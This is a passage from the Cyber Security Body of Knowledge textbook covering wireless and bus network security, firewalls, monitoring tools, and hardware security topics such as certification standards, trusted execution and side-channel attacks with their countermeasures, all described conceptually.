VLAN functionality. Like VLANs, VXLANs also do not aim to provide confidentiality or integrity
in general. Instead, they are means to segment networks. Worse, however, being on the network
layer, VXLAN packets can traverse the Internet, and may allow attackers to inject spoofed
VXLAN packets into “remote” networks. Thus, care has to be taken, e.g., by ingress filtering at
the network edge to drop VXLAN packets that carry a valid VXLANs endpoint IP address.
Wireless LAN are more vulnerable to security risks due to the broadcast nature of media,
which simplifies eavesdropping. There have been several failed attempts to add integrity and
confidentiality to WLANs communication. First, the Wired Equivalent Privacy (WEP) protocol
used a symmetric key encryption method where the host shares a key with an Access Point
(AP) out of band. WEP had several design flaws. First, a 24-bit IV introduced a weakness in that
≈16 million unique IVs can be exhausted in high-speed links in less than 2 hours. Given that IVs
are sent in plaintext, an eavesdropper can easily detect this reuse and mount a known plaintext
attack. Furthermore, using RC4 allowed for the Fluhrer, Martin and Shamir (FMS) attacks,
in which an attacker can recover the key in an RC4 encrypted stream by capturing a large
number of messages in that stream [1783, 1784]. Furthermore, WEP’s linear CRC was great for
detecting random link errors, but failed to reliably reveal malicious message modifications.
An interim standard called the Wi-Fi Protected Access (WPA) was quickly developed for
backward hardware compatibility, while WPA2 was being worked out. WPA uses the Temporal
Key Integrity Protocol (TKIP) but maintains RC4 for compatibility. The Pre-Shared Key (PSK),
also known as WPA-Personal, is similar to the WEP-Key. However, the PSK is used differently, a
nonce, and PSK are hashed to generate a temporal key. Following this, a cryptographic mixing
function is used to combine this temporal key, the Temporal MAC (TMAC), and the sequence
counter resulting in one key for encryption (128 bits) and another key for integrity (64 bits). As
a consequence, every packet is encrypted with a unique encryption key to avoid FMS-style
attacks. Also, the WPA extends the WEP IV to 48 bits. Several new fields include a new Frame
Check Sequence (FCS) field, a CRC-32 checksum for error correction and a hash function for a
proper integrity check. Due to compromises it made with respect to backwards compatibility,
the WPA has had its own share of attacks, though [1785].
The Wifi alliance then standardized WPA2 in 2004. WPA2 relies on more powerful hardware
supporting a 128-bit AES Counter Mode with the Cipher Block Chaining Message Authentica-
tion Code Protocol (CCMP), obsoleting RC4. It also provides an improved 4-way handshake
and temporary key generation method (which does not feature forward secrecy, though).
While implementations of this handshake were shown insecure [1786], the general handshake
methodology was formally verified and is still believed to be secure [1787, 1788].
In 2018, a new WPA3 standard was accepted to make a gradual transition and eventually
replace the WPA2. WPA3 overcomes the lack of perfect forward secrecy in WPA and WPA2.
The PSK is replaced with a new key distribution called the Simultaneous Authentication of
Equals (SAE) based on the IETF Dragonfly key exchange. The WPA3-Personal mode uses a
128-bit encryption, whereas the WPA3-Enterprise uses 192-bit encryption.
The discussion so far assumed that there is a shared secret between WLAN users and APs
from which session keys can be derived. In fact, enterprise settings usually handle WLAN
access control using perform strong authentication such as 802.1X (Section 19.3.4.1). Ideally,
WLAN users have their own client certificates that provide much stronger security than any
reasonably user-friendly password. In contrast, for openly accessible networks such as at
airports or restaurants, there may neither be PSKs nor certificates. Consequently, the lack of
strong encryption would leave communication unprotected. Opportunistic Wireless Encryption
(OWE) tackles this open problem [1789]. Instead of using a PSK during the WPA2/3 four-way
handshake, the client and AP use a pairwise secret derived from an initial DHKE.
Bus networks follow a special topology in that all nodes are directly connected to a shared
medium (the bus). Securing a bus is inherently complex, especially if we assume that an insider
attacker is connected to the bus. In order to illustrate this, we will focus on the Controller Area
Network (CAN) standard, which despite its age is still quite commonly used in cars today.
CAN nicely reveals many issues that can arise on bus networks in general. CAN connects
so-called Electrical Control Units (ECUs), such as a car’s wheel, break pedal or the radio.
CAN is a real-time protocol designed to give priority to more urgent ECUs (e.g., brake pedal)
over less pressing ones (e.g., multimedia control). Sadly, CAN suffers from severe security
vulnerabilities. They become especially problematic if ECUs are or turn malicious (e.g., after
compromise). First, CAN does not authenticate messages, i.e., any compromised ECU (e.g.,
multimedia system) can easily spoof messages of critical components (e.g., wheel speed
sensor). Second, compromised bus components can receive and invalidate all messages of
any arbitrary other ECUs on the same bus. For example, a compromised ECU could suppress
the signals sent by an activated brake pedal. Finally, and a little less concerning than the
previous examples, CAN is unencrypted, providing no confidentiality against sniffing.
A radical protocol change could solve all these problems. In fact, there are new standards
like AUTomotive Open System ARchitecture (AUTOSAR) [1790] that provide improved security
principles. Yet, as always, such radical changes take a long time in practice, as they break
compatibility of existing devices. Also, devices have a years-long development cycle and usage
time. Vendors are aware of these issues and aim to mitigate the problem by segmenting critical
components from less critical ones (segmentation in general is discussed in Section 19.3.4.5).
While certainly a vital step, as it physically disconnects more complex and vulnerable devices
such as multimedia systems from safety-critical devices, this only reduces and not entirely
eliminates the attack surface. A star topology would solve many of these issues, as the
medium is no longer shared and address spoofing could be validated by a central entity. Yet star
topologies incur significant additional physical cables, and thus, higher costs, manufacturing
complexity, and weight. Academia explored several approaches to add message authenticity
to CAN and to prevent spoofing on CAN without breaking backwards-compatibility [1791, 1792].
None of them found wide deployment in practice yet, though, possibly due to costs and the
need to adapt ECUs. Alternative approaches aim to detect spoofed messages by learning and
modeling the per-ECU voltage of bus messages. Unfortunately, such classifiers were proven
unreliable [1793]. A wider popularity of CAN-FD [1738], which offers a flexible data rate and
larger messages (64B instead of 8B in CAN) will decrease overhead of security add-ons and
may thus ease the development of more secure CAN communication in the future.
Many of the observed problems generalize beyond CAN to any bus system or even shared-
medium network. Rogue components on a bus can suppress messages by invalidating them,
anyone on a bus can see all messages, and there are no built-in protection against spoofing.
Physical separation and segmentation of bus networks remains one of the key concepts to
securing them. In addition, to add security guarantees to insecure bus protocols, we sometimes
see complete protocol overhauls that typically break backward compatibility. For example, the
insecure Modbus standard from 1979 [1736] has a secure alternative (Modbus/TCP Security
Protocol [1794]) since 2018, which wraps bus messages in secure TLS-protected channels.
19.4.1 Firewalling
Firewalls can be co-located with routers or implemented as specialised servers. In either case,
they are gatekeepers, inspecting all incoming/outgoing traffic. Firewall systems are typically
configured as bastion hosts, i.e., minimal systems hardened against attacks. They apply traffic
filters based on a network’s security policy and treat all network packets accordingly. The
term filter is used for a set of rules configured by an administrator to inspect a packet and
perform a matching action, e.g., let the packet through, drop the packet, drop and generate
a notification to the sender via ICMP messages. Packets may be filtered according to their
source and destination network addresses, protocol type (TCP, UDP, ICMP), TCP or UDP
source/destination port numbers, TCP Flag bits (SYN/ACK), rules for traffic from a host or
leaving the network via a particular interface and so on. Traditionally, firewalls were pure
packet filters, which worked on inspecting header field only. By now, firewalls can also be
stateful, i.e., they retain state information about flows and can map packets to streams. While
stateful firewalls allow to monitor related traffic and can map communication to flows, this
comes at the cost of maintaining (possibly lots of) state.
Rule State Src IP Src Port Dst IP Dst Port Proto Action
#1 NEW 172.16.0.0/24 * * 80, 443 TCP ACCEPT
#2 NEW * * 172.16.20.5 22 TCP ACCEPT
#3 ESTABLISHED * * * * TCP ACCEPT
#4 * * * * * * DROP
Figure 19.6: Firewalling example. Rule #1 allows outgoing HTTP(S), rule #2 allows incoming
SSH.
Figure 19.6 shows a simple example firewall configuration. All internal hosts (here, in network
172.16.0.0/24) are allowed to communicate to TCP ports 80/443 for HTTP/HTTPS to
external hosts (rule #1). External hosts can connect to an internal SSH server via TCP on port
22 (rule #2). All follow-up communication of these connections is granted (rule #3). Any other
communication is dropped (rule #4). In reality, firewall configurations can become incredibly
more complex than this minimal example. Specifying complete and coherent policies is
typically hard. It typically helps to first lay out a firewall decision diagram, which is then—ideally
automatically—transferred into concrete, functionally equivalent firewall policies [1795]. Tools
like Firewall Builder [1796] or Capirca [1797] can assist in this process.
Application Gateway (AG): Application gateways, aka application proxies, perform access
control and thus facilitate any additional requirements of user authentication before a ses-
sion is admitted. These AGs can also inspect content at the application layer, unless fully
encrypted. In a typical setting, the application gateway will use a firewall’s services after
performing authentication and policy enforcement. A client wanting to access an external
service would connect to the AG first. The AG would prompt them for authentication before
initiating a session to the external server. The AG would now establish the connection with
the destination acting as a relay on behalf of the client, essentially creating two sessions like
a PITM. Another interesting application of an AG is TLS termination. An incoming webserver
TLS connection could be terminated at the AG, so that it could do the resource intensive en-
cryption/decryption and pass the un-encrypted traffic to the back-end servers. In practice, the
AGs are also configured to inspect encrypted outbound traffic where the clients are configured
with corresponding certificates installed at the AG.
Circuit-level Gateway (CG): A CG is a proxy that functions as a relay for TCP connections,
thus allowing hosts from a corporate Intranet to make TCP connections over the Internet. CGs
are typically co-located with a firewall. The most widely used CG today is SOCKS. For end user
applications, it runs transparently as long as the hosts are configured to use SOCKS in place
of a standard socket interface. A CG is simple to implement compared to an AG, as it does
not need to understand application layer protocols.
DMZ: Network design ensures careful firewall placements by segmenting networks. Typically,
the Demilitarised Zone (DMZ) (aka a perimeter network) is created. All external untrusted
users are restricted from using the services available in this zone. Typically, an organisation’s
public web server and authoritative DNS would reside in the DMZ. The rest of the network
is partitioned into several security zones by a security architect. For example, a payment
database would be deployed to an isolated network, so would an internal file server.
hosts to locations. Having said this, unless augmented with the according key material, these
forensic tools are limited to analyzing non-secure communication.
Network scans allow network administrators to enumerate hosts and services within their
network (or, optionally, the entire Internet). There are numerous tools such as Nmap [1816] or
Zmap [1767] that can send, e.g., ICMP and SYN probes at scale.
IP telescopes are publicly reachable network ranges that do not host any service or client.
Given these networks are still routed, though, one can monitor any traffic sent to them and
derive interesting observations. For example, IP telescopes help observing network scans
by others [1817]. Similarly, they allow to spot backscatter [1818], i.e., responses of traffic that
attackers have provoked when using the telescope’s IP addresses in IP spoofing attacks (e.g.,
when assigning random IP addresses during SYN floods).
Honeypots are system used by defenders to trap attackers. They are intentionally vulnerable
yet well-isolated client or server systems that are exposed to attackers. There is a wide diversity
of client-side honeypots (e.g., to emulate browser vulnerabilities [1819]) and server-side hon-
eypots (e.g., to emulate service vulnerabilities [1820, 1821], or to attract DDoS attacks [1822]).
Observing the techniques attackers use to exploit these honeypots gives valuable insights
into tactics and procedures.
Network reputation services can help to assess the trustworthiness of individual network
entities such as IP addresses or domain names. Based on past behaviour observed from
an entity, these mostly commercial providers publish a score that serves as reputation for
others. Identifying badly reputed hosts in network traffic can help to detect known attackers
or connections to botnets. Reputation services are, however, limited in coverage and accuracy
due to volatile domaind and IP address usage of attacking hosts.
Finally, Security Information and Event Management (SIEM) systems collect events from
security-critical sensors (e.g., IDS, firewalls, host-based sensors, system log files). A SIEM
system then analyes these events to distill and raise security-critical incidents for further
inspection. It is particularly the combination of multiple data sources (system log files, host-
based anomaly sensors, firewall or IDS events) that makes SIEM so successful in detecting,
e.g., brute force attacks, worm propagations, or scans.
Spanning Tree Algorithm (SPTA) for topology updates. In a DoS attack, an adversary could
advertise a fake link and force the SPTA to block legitimate ports. Similarly, being in a central
position, SDN controllers can be target of DoS attacks [1825]. Furthermore, Hong et al. [1826]
provide a number of attack vectors on practical SDN switch implementations. SDN switches
are also prone to a timing side channel attack [1827]. For example, attackers can send a packet
and measure the time it takes the switch to process this packet. For a new packet, the switch
will need to fetch a new rule from the controller, thus resulting in additional delay over the
flows that already have rules installed at the switch. Consequently, the attacker can determine
whether an exchange between an IDS and a database server has taken place, or whether a
host has visited a particular website. A possible countermeasure would introduce delay for
the first few packets of every flow even if a rule exists [1828]. A more extensive analysis of
SDN vulnerabilities in general can be found in a study by Zerkane et al. [1829].
Network Functions Virtualisation (NFV) aims to reduce capex and allow for the rapid intro-
duction of new services to the market. Specialised network middleboxes such as firewalls,
encoders/decoders, DMZs and deep packet inspection units are typically closed black box
devices running proprietary software [1830]. NFV researchers have proposed the deployment
of these middleboxes entirely as virtualised software modules and managed via standard-
ised and open APIs. These modules are called Virtual Network Functions (VNFs). A large
number of possible attacks concern the Virtual Machine (Hypervisor) as well as configuring
virtual functions. Lal et al. [1831] provide a table of NFV security issues and best practice
for addressing them. For example, an attacker can compromise a VNF and spawn other
new VNFs to change the configuration of a network by blocking certain legitimate ports. The
authors suggest hypervisor introspection and security zoning as mitigation techniques. Yang
et al. [1832] provide a comprehensive survey on security issues in NFV.
19.5 CONCLUSION
[1733, c5] [1735, c8,c11] [1732, c6]
beyond this KA. A great starting point for further reading is Ivancic’ security analysis on
delay-tolerant networks [1842].
Network Covert Channels: Network covert channels aim to hide the pure existence of commu-
nication, e.g., using steganography. They allow two or more collaborating attacker processes
to leak sensitive information despite network policies that should prevent such leakage. For ex-
ample, attackers may encode sensitive information in TCP headers that will remain unnoticed
by IDS [1843]. Similar covert channels are possible for other protocols, such as DNS [1844] or
IP [1845]. Covert channels can be confined by carefully modeling and observing all protocols
fields or patterns in general that could be abused for hiding information [1846].
Payment Networks: The banking sector foresees its own proprietary standards and network
protocols. Exploring those in detail goes beyond the scope of this document, particularly also
because protocols can be even specific to certain regions (e.g., FinTS in Germany) or special
purposes (e.g., 3-D Secure for securing credit card transactions). The rise of digital currencies
such as Bitcoin which implement several protocols on their own add further complexity. Finally,
stock exchanges nowadays heavily depend on reliable networks, and are extremely sensitive
to timing attacks that require careful Quality-of-Service assurances [1847, 1848].
Physical-Layer Security: Our security analyses stopped at the logical part of the link layer.
The physical part of this layer deserves further attention and indeed is a subject on its own. In
fact, we witnessed several recent advancements in this field, such as Bluetooth Low Energy,
distance bounding and positioning protocols, Near-Field Communication (NFC) or cellular
networks. For a detailed treatment of this subject, we refer to the Physical Layer and Telecom-
munications Security Knowledge Area (Chapter 22).
Networking Infrastructure Security: We have so far assumed that networking components are
fully trusted. However, with global supply chains that involve dozens of parties and countries
during manufacturing a component, such assumption may be easily invalidated in practice.
What happens if network infrastructure, which often is part of critical infrastructures, cannot
be trusted, e.g., due to backdoors or software vulnerabilities? Answering this question is far
from trivial, as it depends on which components and which security guarantees are at stake.
One recent real-world example of such an analysis happens in 5G networks, where some
countries ban hardware that is delivered by some other countries, simply because of lacking
trust. This quickly turns into a non-networking issue that finds its solutions in other chapters,
such as in the Software Security Knowledge Area (Chapter 15), the Secure Software Lifecycle
Knowledge Area (Chapter 17) or Hardware Security Knowledge Area (Chapter 20). Discussing
non-trustworthy networking components goes beyond the scope of this chapter.
Cross-Border Regulations: Networks that span several countries and thus legislations are
quite interesting from a law perspective. There may be conflicts of law, e.g., regarding patents,
export restrictions, or simply the question whether or not a digital signature is legally binding.
These topics are addressed in depth in the Law & Regulation Knowledge Area (Chapter 3).
[1733]
[1734]
[1735]
[1732]
[1731]
19.1 Security Goals and Attacker Models c8 c1 c1 c6 c8
19.2 Networking Applications c1 c1
19.3.1 Security at the Application Layer c8 c6,c15,c19–c22 c8
19.3.2 Security at the Transport Layer c8 c4,c6 c8
19.3.3 Security at the Internet Layer c8 c5,c9 c17 c8
19.3.4 Security on the Link Layer c8 c7 c8
19.4 Network Security Tools c8 c5,c8,c11,c12 c23 c6 c8
19.5 Conclusion c5 c8,c11 c6
681
The Cyber Security Body Of Knowledge
www.cybok.org
INTRODUCTION
Hardware security covers a broad range of topics from trusted computing to Trojan circuits. To
classify these topics we follow the different hardware abstraction layers as introduced by the Y-
chart of Gajski & Kuhn. The different layers of the hardware design process will be introduced
in section 20.1. It is linked with the important concept of a root of trust and associated
threat models in the context of hardware security. Next follows section 20.2 on measuring
and evaluating hardware security. The next sections gradually reduce the abstraction level.
Section 20.3 describes secure platforms, i.e. a complete system or system-on-chip as trusted
computing base. Next section 20.4 covers hardware support for software security: what
features should a programmable processor include to support software security. This section
is closely related to the Software Security Knowledge Area (Chapter 15). Register transfer
level is the next abstraction level down, covered in section 20.5. Focus at this level is typically
the efficient and secure implementation of cryptographic algorithms so that they can be
mapped on ASIC or FPGA. This section is closely related to the Cryptography Knowledge
Area (Chapter 10). All implementations also need protection against physical attacks, most
importantly against side-channel and fault attacks. Physical attacks and countermeasures are
described in section 20.6. Section 20.7 describes entropy sources at the lowest abstraction
level, close to CMOS technology. It includes the design of random numbers generators and
physically unclonable functions. The last technical section describes aspects related to the
hardware design process itself. This chapter ends with the conclusion and an outlook on
hardware security.
Transistor layout
Cell layout
Module layout
Floorplans
Physical partitions
Physical Domain
side-channel leakage into account the attacker has the algorithm level information as well as
the extra timing, power, electro-magnetic information as observable from the outside of the
chip. Thus the attacker model moves from black box to gray box. It is still assumed that the
attacker does not know the details of the internals, e.g. the contents of the key registers.
Example 3: for programmable processors, the model between hardware and software is
traditionally considered the Instruction Set Architecture (ISA). The ISA is what is visible to the
software programmer and the implementation of the ISA is left to the hardware designer. The
ISA used to be considered the trust boundary for the software designer. Yet, with the discovery
of micro-architectural side-channel attacks, such as Spectre, Meltdown, Foreshadow, this
ISA model is no longer a black box, as also micro-architectural information and leakage are
available to the attacker [1851].
20.1.4 Root of trust, threat model and hardware design abstraction layers
Abstraction level Root of trust - Structural (how) - Example Threats Typical HW design
functionality examples activities
System and Secure platforms e.g. Trusted to support security
application Execution isolation, integrity, application
(Trustzone, SGX, attestation, . . . development
TEE), HSM, Secure
Element
Processor general purpose e.g. shadow stack SW vulnerabilities ISA, HW/SW
co-design
Processor domain specific Crypto specific Timing attacks Constant number
RTL of clock cycles
Register Transfer Crypto specific Building blocks, Side Channel Logic synthesis
Attack,
Logic Resistance to SCA, Masking, Circuit Side Channel FPGA tools,
Power, EM, fault styles attack, fault standard cell
design
Circuit and Source of entropy TRNG, PUF, Secure Temperature, SPICE simulations
technology SRAM glitches
Physical Tamper Shields, sensors Probing, heating Layout activities
Resistance
Table 20.1: Design abstraction layers linked to threat models, root of trust and design activities
are added to address these software vulnerabilities, such as a shadow stack or measures
to support hardware control flow integrity. Domain specific processors typically focus on
a limited functionality. They are typically developed as co-processors in larger systems-on-
chip. Typical examples are co-processors to support public key or secret key cryptographic
algorithms. Time at the processor level is typically measured in instruction cycles.
Both general purpose and domain specific processors are composed together from compu-
tational units, multipliers and ALU’s, memory and interconnect. These modules are typically
described at the register transfer level: constant-time and resistance against side-channel
attacks become the focus. Time at this level is typically measured in clock cycles.
Multipliers, ALU’s, memories, interconnect and bus infrastructure are created from gates
and flip-flops at the logic level. At this design abstraction level, focus is on leakage through
physical side-channels, power, electro-magnetic, and fault attacks. Time is typically measured
in absolute time (nsec) based on the available standard cell libraries or FPGA platforms.
The design of entropy sources requires knowledge and insights into the behavior of transistors
and the underlying Complementary Metal-Oxide-Semiconductor (CMOS) technology.The de-
sign of these hardware security primitives is therefore positioned at the circuit and transistor
level. Similarly the design of sensors and shields against physical tampering require insight
into the technology. At the circuit and technology level it is measured in absolute time, e.g.
nsec delay or GHz clock frequency.
The table 20.1 does not aim to be complete. The idea is to illustrate each abstraction layer
with an example. In the next sections, the hardware security goals and their associated threat
models will be discussed in detail in relation to and relevance for each abstraction layer.
20.2.1 FIPS140-2
FIPS140-2 is a US NIST standard used for the evaluation of cryptographic modules. FIPS140-2
defines security levels from 1 to 4 (1 being the lowest). The following gives a description of the
four levels from a physical hardware security point of view. Next to the physical requirements,
there are also roles, services and authentication requirements (for more details see [1852]
and other KAs).
Security level 1 only requires than an approved cryptographic algorithm be used, e.g. AES or
SHA-3, but does not impose physical security requirements. Hence a software implementation
could meet level 1. Level 2 requires a first level of tamper evidence. Level 3 also requires the
tamper evidence, but on top requires tamper resistance.
NIST defines tampering as an intentional but unauthorized act resulting in the modification of
a system, components of systems, its intended behavior, or data, [1853].
Tamper evidence means that there is a proof or testimony that tampering with a hardware
module has happened. E.g. a broken seal indicates that a device was opened. A light sensor
might observe that the lid of a chip package was lifted.
Tamper resistance means that on top of tamper evidence, protection mechanisms are added
to the device. E.g. by extra coating or dense metal layers, it is difficult to probe the key registers.
Level 4 increases the requirements such that the cryptographic module can operate in physi-
cally unprotected environments. In this context, the physical side-channel attacks pose an
important threat. If any of these physical components depend on sensitive data being pro-
cessed, information is leaked. Since the device is under normal operation, a classic tamper
evidence mechanism will not realize that the device is under attack. See later in section 20.6.
to EAL1, to formally verified design and tested, corresponding to the highest level EAL7. CC
further subdivides the process of evaluation into several classes, where most of the classes
verify the conformity of the device under test. The 5th class (AVA) deals with the actual
vulnerability assessment. It is the most important class from a hardware security viewpoint
as it searches for vulnerabilities and associated tests. It will assign a rating on the difficulty
to execute the test, called the identification, and the possible benefit an attacker can gain
from the penetration, called the exploitation. The difficulty is a function of the time required
to perform the attack, the expertise of the attacker from layman to multiple experts, how
much knowledge of the device is required from simple public information to detailed hardware
source code, the number of samples required, and the cost and availability of equipment to
perform the attack, etc. A high difficulty level will result in a high score and a high level of the
AVA class. The highest score one can obtain is an AVA level of 5, which is required to obtain a
top EAL score.
Its usage is well established in the field of smartcards and secure elements as they are used
in telecom, financial, government ID’s applications. It is also used in the field of Hardware
Security Modules, Trusted Platform Modules and some more [1854]. For certain classes of
applications minimum sets of requirements are defined into protection profiles. There exists
protection profiles for Trusted Platform Module (TPM), Javacards, Biometric passports, SIM
cards, secure elements, etc.
Since certification comes from one body, there exist agreements between countries so that
the certifications in one country are recognized in other countries. As an exception EMVCo
is a private organization to set the specifications for worldwide interoperability of payment
transactions. It has its own certification procedure similar to CC.
Please note that the main purpose of a common criteria evaluation is to verify that an IT product
delivers the claims promised in the profile. It does not mean that there are no vulnerabilities
left. A good introduction to the topic can be found in [1855] and a list of certified products on
[1854].
protection profiles exist depending the application domain: financial, automotive, pay-TV, etc.
A typical embedded secure element is one integrated circuit with no external components. It
consists of a small micro-controller with cryptographic co-processors, secure volatile and
non-volatile storage, TRNG, etc. I/O is usually limited, through a specific set of pins, or through
a NFC wireless connection. Building a secure element is a challenge for a hardware designer,
as one needs to combine security with non-security requirements of embedded circuits: small
form factor (no external memory), low power and/or low energy consumption in combination
with tamper resistance and resistance against physical attacks, such as side-channel and
fault attacks (see section 20.6).
tion, the hardware support could be limited to only machine level support. Memory protection
could be added as an optional hardware module to the processor.
Other more advanced security objectives to support software security might include:
• Sealed storage is the process of wrapping code and/or data with certain configuration,
process or status values. Only under the correct configuration (e.g. program counter
value, nonce, secret key, etc.) can the data be unsealed. Dynamic root of trust in combi-
nation with a late launch guarantees that even if the processor starts from an unknown
state, it can enter a fixed known piece of code and known state. This typically requires
special instructions to enter and exit the protected partition.
• Memory protection refers to the protection of data when it travels between the processor
unit and the on-chip or off-chip memory. It protects against bus snooping or side-channel
attacks or more active fault injection attacks.
• Control flow integrity is a security mechanism to prevent malware attacks from redirect-
ing the flow of execution of a program. In hardware, the control flow of the program is
compared on-the-fly at runtime with the expected control flow of the program.
• Information flow analysis is a security mechanism to follow the flow of sensitive data
while it travels through the different components, from memory to cache over multiple
busses into register files and processing units and back. This is important in the context
of micro-architectural and physical side-channel attacks.
In the next subsections a representative set of hardware approaches to address the above
software security challenges are presented. Some hardware techniques address multiple se-
curity objectives. Some are large complex approaches, others are simple dedicated hardware
features.
As a side note: a large body of knowledge on software-only approaches is available in literature.
Mostly, they offer a weaker level of security as they are not rooted in a hardware root of trust.
E.g. for control flow integrity, software-only approaches might instruct the software code
to check branches or jumps, while hardware support might calculate MACs on the fly and
compare these to stored associated MACs.
the IC can be split into a trusted and a rich part, i.e. the processor core, the crypto accelerators,
the volatile and non-volatile memory are all split. Option 2 assumes that there is a separate
secure co-processor area on the SoC with a well-defined hardware interface to the rest of the
SoC. Option 3 assumes a dedicated off-chip secure co-processor, much like a secure element.
Global Platform defines also a Common Criteria based protection profile (see section 20.2.2)
for the TEE. It assumes that the package of the integrated circuit is a black box [1861] and
thus secure storage is assumed by the fact that the secure asset remains inside the SoC. It
follows the procedures of common criteria assurance package EAL2 with some extra features.
It pays extra attention to the evaluation of the random number generator and the concept of
monotonic increasing time.
The authentication code relies on cryptographic primitives. A challenge for these algorithms
is that they should create the authentication tag with very low latency to fit into the critical
path of a microprocessor. The ARMV8-A architectures uses therefore a dedicated low-latency
crypto algorithm Qarma [1866]. In this approach the unused bits in a 64-bit pointer are used
to store a tag. This tag is calculated based on a key and on the program state, i.e. current
address and function. These tags are calculated and verified on the fly.
Address Space Layout Randomization or Stack canaries area general software technique: its
aim is to make it hard to predict the destination address of the jump. A detailed description
can be found in the Software Security Knowledge Area (Chapter 15).
decide to go for serial or parallel architectures, making use of multiple design tricks to match
the design with the requirements. The most well-known tricks are to use pipelining to increase
throughput, or unrolling to reduce latency, time multiplexing to reduce area, etc.
From implementation viewpoint, at this register transfer abstraction level, a large body of
knowledge and a large set of Electronic Design Automation (EDA) tools exist to map an
application onto a FPGA or ASIC platform [1849]. Implementation results should be compared
not only on the number of operations, but also on memory requirements (program memory
and data memory), throughput and latency requirements, energy and power requirements,
bandwidth requirements and the ease with which side-channel and fault attack countermea-
sures can be added. Please note that this large body of knowledge exists for implementations
that focus on efficiency. However, when combining efficiency with security requirements, such
as constant time execution or other countermeasures, there is a huge lack of supporting EDA
tools (see section 20.8).
is however limited as hash algorithms are recursive algorithms and thus there is an
upper bound on the amount of pipelining that can be applied [1869]. Cryptocurrencies
form part of the more general technology of distributed ledgers, which is discussed in
the Distributed Systems Security Knowledge Area (Chapter 12).
• The computational complexity of public key algorithms is typically 2 or 3 orders of
magnitude higher than secret key and thus its implementation 2 to 3 orders slower or
larger. Especially for RSA and Elliptic curve implementations, a large body of knowledge
is available, ranging from compact [1870] to fast, for classic and newer curves [1871].
• Algorithms resistant to attacks of quantum computers, aka post-quantum secure algo-
rithms, are the next generation algorithms requiring implementation in existing CMOS
ASIC and FPGA technology. Computational bottle-necks are the large multiplier struc-
tures, with/without the Number Theoretic Transform, the large memory requirements
and the requirements on random numbers that follow specific distributions. Currently,
NIST is holding a competition on post-quantum cryptography [1872]. Thus it is expected
that after the algorithms are decided, implementations in hardware will follow.
• Currently, the most demanding implementations for cryptographic algorithms are those
used in homomorphic encryption schemes: the computational complexity, the size of
the multipliers and especially the large memory requirements are the challenges to
address [1873].
20.6.1 Attacks
At the current state of knowledge, cryptographic algorithms have become very secure against
mathematical and cryptanalytical attacks: this is certainly the case for algorithms that are
standardized or that have received an extensive review in the open research literature. Cur-
rently, the weak link is mostly the implementation of algorithms in hardware and software.
Information leaks from the hardware implementation through side-channel and fault attacks.
A distinction is made between passive or side-channel attacks versus active or fault attacks.
A second distinction can be made based on the distance of the attacker to the device: attacks
can occur remotely, close to the device still non-invasive to actual invasive attacks. More
details on several classes of attacks are below.
Passive Side Channel Attacks General side-channel attacks are passive observations of a
compute platform. Through data dependent variations of execution time, power consumption
or electro-magnetic radiation of the device, the attacker can deduce information of secret
internals. Variations of execution time, power consumption or electro-magnetic radiations
are typically picked up in close proximity of the device, while it is operated under normal
conditions. It is important to note that the normal operation of the device is not disturbed.
Thus the device is not aware that it is being attacked, which makes this attack quite powerful
[980].
Side channel attacks based on variations on power consumption have been extensively
studied. They are performed close to the device with access to the power supply or the power
pins. One makes a distinction between Simple Power Analysis (SPA), Differential and Higher
Order Power Analysis (DPA), and template attacks. In SPA, the idea is to first study the target
for features that depend on the key. E.g. a typical target in timing and power attacks are
if-then-else branches that are dependent on key bits. In public key algorithm implementations,
such as RSA or ECC, the algorithm runs sequentially through all key bits. When the if-branch
takes more or less computation time than the else-branch this can be observed from outside
the chip. SPA attacks are not limited to public key algorithms, they have also been applied to
secret key algorithms, or algorithms to generate prime numbers (in case they need to remain
secret). So with knowledge of the internal operation of the device, SPA only requires to collect
one or a few traces for analysis.
With DPA, the attacker collects multiple traces, ranging from a few tens for unprotected
implementations to millions in case of protected hardware implementations. In this situation,
the attacker exploits the fact that the instantaneous power consumption depends on the
data that is processed. The same operation, depending on the same unknown sub-key, will
result in different power consumption profiles if the data is different. The attacker will also
built a statistical model of the device to estimate the power consumption as a function of
the data and the different values of the subkey. Statistical analysis on these traces based on
correlation analysis, mutual information and other statistical tests are applied to correlate the
measured values to the statistical model.
Side channel attacks based on Electro-Magnetic radiations have been recognized early-on
in the context of military communication and radio equipment. As a reaction, NATO and the
governments of many countries have issued TEMPEST [1874]. It consists of specifications on
the protection of equipment against unintentional electro-magnetic radiation but also against
leakage of information through vibrations or sound. Electro-Magnetic radiation attacks can
be mounted from a distance, as explained above, but also at close proximity to the integrated
circuit. Electro-Magnetic probing on top of an integrated circuit can release very localized
information of specific parts of an IC by using a 2D stepper and fine electro-magnetic probers.
Thus electro-magnetic evaluation has the possibility to provide more fine grained leakage
information compared to power measurements.
Timing attacks are another subclass of side-channel attacks [1453]. When the execution time
of a cryptographic calculation or a program handling sensitive data, varies as a function of the
sensitive data, then this time difference can be picked up by the attacker. A timing attack can
be as simple as a key dependent different execution time of an if-branch versus an else-branch
in a finite state machine. Cache attacks, which abuse the time difference between a cache hit
and a cache miss are an important class of timing attacks [1875], [1876], .
With a template attack, the attacker will first create a copy or template of the target device
[1877]. This template is used to study the behavior of the device for all or a large set of inputs
and secret data values. One or a few samples of the target device are then compared to the
templates in the database to deduce secret information from the device. Template attacks
are typically used when the original device has countermeasures against multiple executions.
E.g. it might have an internal counter to log the number of failed attempts. Templates can be
20.6.2 Countermeasures
There are no generic countermeasures that resist all classes of side-channel attacks. De-
pending on the threat model (remote/local access, passive/active, etc.) and the assumptions
made on the trusted computing base (i.e. what is and what is not included in the root of trust),
countermeasures have been proposed at several levels of abstraction. The most important
categories are summarized below.
To resist timing attacks, the first objective is to provide hardware that executes the application
or program in constant time independent of secret inputs, keys and internal state. Depending
on the time granularity of the measurement equipment of the attacker, constant time coun-
termeasures also need to be more fine grained. At the processor architecture level, constant
time means a constant number of instructions. At the RTL level, constant time means a
constant number of clock cycles. At logic and circuit level, constant time means a constant
logic depth or critical path independent of the input data. At instruction level, constant time
can be obtained by balancing execution paths and adding dummy instructions. Sharing of
resources, e.g. through caches, make constant time implementations extremely difficult to
obtain.
At RTL level, we need to make sure that all instructions run in the same number of clock
cycles. dummy operations or dummy gates, depending on the granularity level. Providing
constant time RTL level and gate level descriptions is however a challenge as design tools,
both hardware and software compilers, will for performance reasons synthesize away the
dummy operations or logic which were added to balance the computations.
As many side-channel attacks rely on a large number of observations or samples, randomisa-
tion is a popular countermeasure. It is used to protect against power, electro-magnetic and
timing side-channel attacks. Randomisation is a technique that can be applied at algorithm
level: it is especially popular for public key algorithms, which apply techniques such as scalar
